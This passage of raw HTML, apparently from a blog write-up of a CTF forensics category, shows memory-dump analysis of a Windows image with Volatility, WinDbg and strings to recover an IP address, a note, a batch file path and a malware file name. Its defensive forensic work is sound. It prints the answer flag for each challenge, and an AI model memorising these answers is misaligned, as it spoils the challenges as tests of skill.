class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 30%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABE0lEQVQY05XKyUsCcRjG8fl3une3RaJyCaWDhw7h2NG2calOgpcO3UKKIOg/iQ51DULzUkguU+My47jkmOW334wesiKIhw/vy8MjTU27WQiuMe8L4faHmPWuMuMJCgFcyyu4lvyC7xvvT4seh3R4dkphWOKyfM3V8w23eo68+Uiu+cC9+X9S+iTD06BMVstzV81SaBYptVSKrcqf7M1vOymVOUYfGhhtg1q7RqPToC5Uxf/S0jC6o141VSpmxenqnTp6V0dra/DBBOno4hyLHl2RV5HeOJZInzeh7/zWuLGcpu9s7PWA9wnSXGCdaCqNnDhgI2nbJ5LYE5JE4nHkeAw5ZlOQlR1hm7CyJe5IeHfziyifEUR7h2Hy/wYAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b9a966b06082e3f704da0b91653d162b/8ac56/image-20240123215846068.webp 240w,\n/static/b9a966b06082e3f704da0b91653d162b/47f09/image-20240123215846068.webp 394w\"\n              sizes=\"(max-width: 394px) 100vw, 394px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b9a966b06082e3f704da0b91653d162b/8ff5a/image-20240123215846068.png 240w,\n/static/b9a966b06082e3f704da0b91653d162b/cc097/image-20240123215846068.png 394w\"\n            sizes=\"(max-width: 394px) 100vw, 394px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b9a966b06082e3f704da0b91653d162b/cc097/image-20240123215846068.png\"\n            alt=\"image-20240123215846068\"\n            title=\"image-20240123215846068\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The correct flag is <code class=\"language-text\">KCTF{squad}</code>.</p>\n<h3 id=\"ip-addrforensic\" style=\"position:relative;\"><a href=\"#ip-addrforensic\" aria-label=\"ip addrforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IP Addr(Forensic)</h3>\n<blockquote>\n<p>What is the IP address of this system?</p>\n</blockquote>\n<p>This challenge asks for the system’s IP address.</p>\n<p>This one was also easier to solve with Volatility.</p>\n<p>I used <code class=\"language-text\">vol3 -f KnightSquad.DMP windows.netscan</code> to roughly inspect the local addresses.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1cf93f32306462b6e5b15e69d7d95216/1ff84/image-20240123220410862.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 31.666666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBElEQVQY0z2QyY6DQAxEuXIIJEAIJOxkYRFCBDjx/99V0fNIc2h1y25XvbLTd72qolJVVWqaWlEYKY5j1XWtIAj0eDyUZZk8z1OSJHbO57P9oR9Fka7Xq9Uvl4uccRzVtq3CMFRZlta43+82dDqd7JPruvJ9X3memzEz9DF9vV42T+3z+cjZ911935vQ+/3WcRyihsDtdrNB3hBCAnHTNCqKQl3XaRgGu7/fr6ZpkrOuqykTATfEcUQoTVOLRA9BEhCfBBwA+EsNE+j/CaF5Pp8mQgNiIrMKIvMmIr15no0WAKJCuCzLH+G2bUaIC/hEwgAa3hixRwaJiSFkUENJjd1CyMwPNK6hnIl12/oAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1cf93f32306462b6e5b15e69d7d95216/8ac56/image-20240123220410862.webp 240w,\n/static/1cf93f32306462b6e5b15e69d7d95216/d3be9/image-20240123220410862.webp 480w,\n/static/1cf93f32306462b6e5b15e69d7d95216/e46b2/image-20240123220410862.webp 960w,\n/static/1cf93f32306462b6e5b15e69d7d95216/02506/image-20240123220410862.webp 1040w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1cf93f32306462b6e5b15e69d7d95216/8ff5a/image-20240123220410862.png 240w,\n/static/1cf93f32306462b6e5b15e69d7d95216/e85cb/image-20240123220410862.png 480w,\n/static/1cf93f32306462b6e5b15e69d7d95216/d9199/image-20240123220410862.png 960w,\n/static/1cf93f32306462b6e5b15e69d7d95216/1ff84/image-20240123220410862.png 1040w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1cf93f32306462b6e5b15e69d7d95216/d9199/image-20240123220410862.png\"\n            alt=\"image-20240123220410862\"\n            title=\"image-20240123220410862\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This let me determine that the correct flag is <code class=\"language-text\">KCTF{10.0.2.15}</code>.</p>\n<h3 id=\"noteforensic\" style=\"position:relative;\"><a href=\"#noteforensic\" aria-label=\"noteforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Note(Forensic)</h3>\n<blockquote>\n<p>My boss has written something in the text file. Could you please help me find it?</p>\n</blockquote>\n<p>Next, it seems the challenge asks us to recover information written in a text file.</p>\n<p>This also looked easier to solve with Volatility.</p>\n<p>First, I collected file objects with the command <code class=\"language-text\">vol3 -f KnightSquad.DMP windows.filescan.FileScan</code>.</p>\n<p>Grepping the results showed that the following three text files seem to exist under the user profile.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 705px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/464c04d3c0afca1ca1de6aaedaacf282/d2cbc/image-20240123221213052.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeElEQVQI1z3M0QrCIBhA4V0ubZBTRpPCWW36t5AYvf+rnYZEF9/d4TTxGcmfzK1Ejk5zCXeSFEQy67pWkoXHPBOs4zqOnIzh0LYopSqt9V8jSdjeGzlllFZMU+D1G5VSqmVZKglh7xIxRsZ97L3nPAy4rsNai+l7vvegNdpRirc9AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/464c04d3c0afca1ca1de6aaedaacf282/8ac56/image-20240123221213052.webp 240w,\n/static/464c04d3c0afca1ca1de6aaedaacf282/d3be9/image-20240123221213052.webp 480w,\n/static/464c04d3c0afca1ca1de6aaedaacf282/af945/image-20240123221213052.webp 705w\"\n              sizes=\"(max-width: 705px) 100vw, 705px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/464c04d3c0afca1ca1de6aaedaacf282/8ff5a/image-20240123221213052.png 240w,\n/static/464c04d3c0afca1ca1de6aaedaacf282/e85cb/image-20240123221213052.png 480w,\n/static/464c04d3c0afca1ca1de6aaedaacf282/d2cbc/image-20240123221213052.png 705w\"\n            sizes=\"(max-width: 705px) 100vw, 705px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/464c04d3c0afca1ca1de6aaedaacf282/d2cbc/image-20240123221213052.png\"\n            alt=\"image-20240123221213052\"\n            title=\"image-20240123221213052\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>As a long shot, I tried running <code class=\"language-text\">windows.dumpfiles.DumpFiles</code> against these files, but unfortunately I could not recover them.</p>\n<p>Text files and the like are often not cached, so it can’t be helped.</p>\n<p>Next, I tried <code class=\"language-text\">windows.cmdline.CmdLine</code>.</p>\n<p>This shows that there is one Notepad process.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 814px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/601ffe85438278c21790791372882877/a4262/image-20240123221709967.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 13.750000000000002%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAn0lEQVQI1z2OOwqFMBREXYKFiI2CiaApjCaKK7AUBI2NH3D/m5jHHfAVw70znOJEWZahaRq0bYuqqhDHMYwxGIYBXdfBWsv0fc8Iq5QiK7eua/5JkiBNU0TLsiCEgOu6sG0b5nnG8zw4z5O57/t/3/cldxwH+7dJ3/cd67oiyvOcBtM00aAoCozjyDjnuIn9Zynmwnrv2WXXWtO2LEv8AHYuY4tP3yzEAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/601ffe85438278c21790791372882877/8ac56/image-20240123221709967.webp 240w,\n/static/601ffe85438278c21790791372882877/d3be9/image-20240123221709967.webp 480w,\n/static/601ffe85438278c21790791372882877/f23e7/image-20240123221709967.webp 814w\"\n              sizes=\"(max-width: 814px) 100vw, 814px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/601ffe85438278c21790791372882877/8ff5a/image-20240123221709967.png 240w,\n/static/601ffe85438278c21790791372882877/e85cb/image-20240123221709967.png 480w,\n/static/601ffe85438278c21790791372882877/a4262/image-20240123221709967.png 814w\"\n            sizes=\"(max-width: 814px) 100vw, 814px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/601ffe85438278c21790791372882877/a4262/image-20240123221709967.png\"\n            alt=\"image-20240123221709967\"\n            title=\"image-20240123221709967\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>To read the contents of process memory, I used WinDbg.</p>\n<p>First, I identified the address of the process object for <code class=\"language-text\">notepad.exe</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 574px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c0aeb237db3e2d1c28c5863443849586/86389/image-20240123221839130.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQY002PS2+DMBCE+f8/qrnkUpzQKIHEJN4WsLACpSi8H5fpYiIlh08ej3Zndx1SCup2w5WRUoJIwfd91iGy7I62bdE0DbquY1a9eAt1XT+pUFUrTpqm2O0EXNeFKwS8/R6frAVD9I0wlDifCdttjI+NhhB3/vvwvC8oXuZw+MVP9IfqUaIsSzjLJHm5IAgCKCKcTke7qdbakiQaxhgOJ0RRBJMaxHHMfsIXZMjzHEVR2DAbOI7j85wXfd9jYH+aJstSM88zs+p3fxgGi+3h9x+z4ifUxn0bqwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c0aeb237db3e2d1c28c5863443849586/8ac56/image-20240123221839130.webp 240w,\n/static/c0aeb237db3e2d1c28c5863443849586/d3be9/image-20240123221839130.webp 480w,\n/static/c0aeb237db3e2d1c28c5863443849586/4e18f/image-20240123221839130.webp 574w\"\n              sizes=\"(max-width: 574px) 100vw, 574px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c0aeb237db3e2d1c28c5863443849586/8ff5a/image-20240123221839130.png 240w,\n/static/c0aeb237db3e2d1c28c5863443849586/e85cb/image-20240123221839130.png 480w,\n/static/c0aeb237db3e2d1c28c5863443849586/86389/image-20240123221839130.png 574w\"\n            sizes=\"(max-width: 574px) 100vw, 574px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c0aeb237db3e2d1c28c5863443849586/86389/image-20240123221839130.png\"\n            alt=\"image-20240123221839130\"\n            title=\"image-20240123221839130\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I tried switching context to this process and investigating it, but it seemed to be paged out, so I couldn’t examine it.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 756px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/32ba1e945a4fdf2e5b3800dd9446261a/8ae3e/image-20240123222037307.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 9.583333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAbUlEQVQI1zWNSw6AIBQDvf/tCAgIKJ8QWGjC5wJVX8JikmkX7WaMgVIK1lo452COA4wxcM5xXhfu58GcE2MM4veVl7fW0HsnNq01hBCQUmLfJWKMKKXQgQ/hO7GUf2qtCF/nvSdPKSHnTONr8AVMFJLn+EZJOAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/32ba1e945a4fdf2e5b3800dd9446261a/8ac56/image-20240123222037307.webp 240w,\n/static/32ba1e945a4fdf2e5b3800dd9446261a/d3be9/image-20240123222037307.webp 480w,\n/static/32ba1e945a4fdf2e5b3800dd9446261a/b5834/image-20240123222037307.webp 756w\"\n              sizes=\"(max-width: 756px) 100vw, 756px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/32ba1e945a4fdf2e5b3800dd9446261a/8ff5a/image-20240123222037307.png 240w,\n/static/32ba1e945a4fdf2e5b3800dd9446261a/e85cb/image-20240123222037307.png 480w,\n/static/32ba1e945a4fdf2e5b3800dd9446261a/8ae3e/image-20240123222037307.png 756w\"\n            sizes=\"(max-width: 756px) 100vw, 756px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/32ba1e945a4fdf2e5b3800dd9446261a/8ae3e/image-20240123222037307.png\"\n            alt=\"image-20240123222037307\"\n            title=\"image-20240123222037307\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Out of desperation, I ran <code class=\"language-text\">strings</code>, which let me obtain the flag for the next challenge, Execution, but not the flag for this one.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 661px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/78fb4fa078d4bc40861181f3f6c64f96/0012b/image-20240123223020408.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA6klEQVQY032QuXKEMBBECbkSENoFA0Vxq4RAEvbixBt4//+f2ox8BK6yg66ZZN50t8dFhvLlCZeNg6sUeVmhawzmeYZSCsMwoK5rCCGwbRustW62bYuyLNE0DbquA2MMYRjCk0LCaouxHzGee5cy7NcrpJQOSlrX1QHT9HyY58iyDEEQIIoip+89jmN4+77j/fHArjVuw4jnacbronAcB7QxzhGJoJxz+L7vnNDxbxHUo1hv9zvMsuDGLjg2jeWEG/MZm5xSvKqqUBTFj5M/gdTRQl2dR4JxiL7H9BWVupmmycEoZpIk/wJJH+rOhg6viQWtAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/78fb4fa078d4bc40861181f3f6c64f96/8ac56/image-20240123223020408.webp 240w,\n/static/78fb4fa078d4bc40861181f3f6c64f96/d3be9/image-20240123223020408.webp 480w,\n/static/78fb4fa078d4bc40861181f3f6c64f96/84ccf/image-20240123223020408.webp 661w\"\n              sizes=\"(max-width: 661px) 100vw, 661px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/78fb4fa078d4bc40861181f3f6c64f96/8ff5a/image-20240123223020408.png 240w,\n/static/78fb4fa078d4bc40861181f3f6c64f96/e85cb/image-20240123223020408.png 480w,\n/static/78fb4fa078d4bc40861181f3f6c64f96/0012b/image-20240123223020408.png 661w\"\n            sizes=\"(max-width: 661px) 100vw, 661px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/78fb4fa078d4bc40861181f3f6c64f96/0012b/image-20240123223020408.png\"\n            alt=\"image-20240123223020408\"\n            title=\"image-20240123223020408\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After looking into it more, I found that files that cannot be recovered with <code class=\"language-text\">windows.dumpfiles.DumpFiles</code> can sometimes be recovered using the <code class=\"language-text\">dumpfiles</code> plugin in Volatility 2. (I don’t fully understand the difference. Maybe it doesn’t retrieve them through the cache manager?)</p>\n<p>So I output the text file with <code class=\"language-text\">volatility_2.6_win64_standalone.exe -f KnightSquad.DMP --profile=Win7SP1x64_23418 dumpfiles -Q 0xb9ba7bb0 --name file -D outdir</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/8c6f7e1180ce58ed888c1ed72200ef8d/da20e/image-20240123224319656.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 4.583333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAQUlEQVQI1x3GSQ6AQAgFUe/QDBsCMS3iwvtf7yssKq+Osy7U86LqRmb+FvbecHdExHzbmRmYGao6diICIsJaa/wARWsauF3gWSkAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/8c6f7e1180ce58ed888c1ed72200ef8d/8ac56/image-20240123224319656.webp 240w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/d3be9/image-20240123224319656.webp 480w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/e46b2/image-20240123224319656.webp 960w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/0cc45/image-20240123224319656.webp 1397w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/8c6f7e1180ce58ed888c1ed72200ef8d/8ff5a/image-20240123224319656.png 240w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/e85cb/image-20240123224319656.png 480w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/d9199/image-20240123224319656.png 960w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/da20e/image-20240123224319656.png 1397w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8c6f7e1180ce58ed888c1ed72200ef8d/d9199/image-20240123224319656.png\"\n            alt=\"image-20240123224319656\"\n            title=\"image-20240123224319656\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The text file contained a Base64-encoded flag, allowing me to determine that the correct flag was <code class=\"language-text\">KCTF{Respect_Y0ur_Her4nki}</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token assign-left variable\">S0NURntSZXNwZWN0X1kwdXJfSGVyNG5raX0</span><span class=\"token operator\">=</span> RISC OS\nRISCOS\nFire OS\nFireOS\nmacOS\nmac OS\nMac OS X</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 762px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a7b15f6ec161df1e909876cf0dda6ce3/a016c/image-20240123224540625.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 8.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeElEQVQI11WJUQuCMBgAfW0fy6T8tgkz15hpZGT9/992kQ9BD8fBXeWfDp2PhOHCOa9M00Q/9ozvkbQMlDUzP+5cb6/tpZQopZBzxntPjHFrqoq1lqoLHe2pxTuHc0rwAasWE3ZIEEQNUtfsm45D02CM+UNEfv7yAeI1M14tEcItAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a7b15f6ec161df1e909876cf0dda6ce3/8ac56/image-20240123224540625.webp 240w,\n/static/a7b15f6ec161df1e909876cf0dda6ce3/d3be9/image-20240123224540625.webp 480w,\n/static/a7b15f6ec161df1e909876cf0dda6ce3/093df/image-20240123224540625.webp 762w\"\n              sizes=\"(max-width: 762px) 100vw, 762px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a7b15f6ec161df1e909876cf0dda6ce3/8ff5a/image-20240123224540625.png 240w,\n/static/a7b15f6ec161df1e909876cf0dda6ce3/e85cb/image-20240123224540625.png 480w,\n/static/a7b15f6ec161df1e909876cf0dda6ce3/a016c/image-20240123224540625.png 762w\"\n            sizes=\"(max-width: 762px) 100vw, 762px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a7b15f6ec161df1e909876cf0dda6ce3/a016c/image-20240123224540625.png\"\n            alt=\"image-20240123224540625\"\n            title=\"image-20240123224540625\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"executionforensic\" style=\"position:relative;\"><a href=\"#executionforensic\" aria-label=\"executionforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Execution(Forensic)</h3>\n<blockquote>\n<p>My leader, Noman Prodhan, executed something in the cmd of this infected machine. Could you please figure out what he actually executed?</p>\n</blockquote>\n<p>From the results of running <code class=\"language-text\">strings</code> on the dump file, I found that <code class=\"language-text\">KCTF{W3_AR3_tH3_Kn1GHt}</code> was the flag.</p>\n<h3 id=\"path-of-the-executableforensic\" style=\"position:relative;\"><a href=\"#path-of-the-executableforensic\" aria-label=\"path of the executableforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Path of the Executable(Forensic)</h3>\n<blockquote>\n<p>What is the path folder of the executable file which execute privious flag?</p>\n</blockquote>\n<p>Looking at the results of <code class=\"language-text\">strings -a -t d -el KnightSquad.DMP | grep KCTF{</code>, I found that <code class=\"language-text\">C:\\Users\\siam>C:\\Users\\siam\\Documents\\windows.bat</code> outputs the previous flag.</p>\n<p>Therefore, <code class=\"language-text\">KCTF{C:\\Users\\siam\\Documents}</code> is the correct flag.</p>\n<h3 id=\"maliciousforensic\" style=\"position:relative;\"><a href=\"#maliciousforensic\" aria-label=\"maliciousforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Malicious(Forensic)</h3>\n<blockquote>\n<p>What is the malicious software name?</p>\n</blockquote>\n<p>I had already identified a suspicious file in the output of <code class=\"language-text\">windows.filescan.FileScan</code>, so I found that <code class=\"language-text\">KCTF{MadMan.exe}</code> was the correct flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 500px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/81ebcd671d7f9a751539b7507ff469b5/0b533/image-20240123225135938.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 23.75%; position: relative; bottom: 0; left: 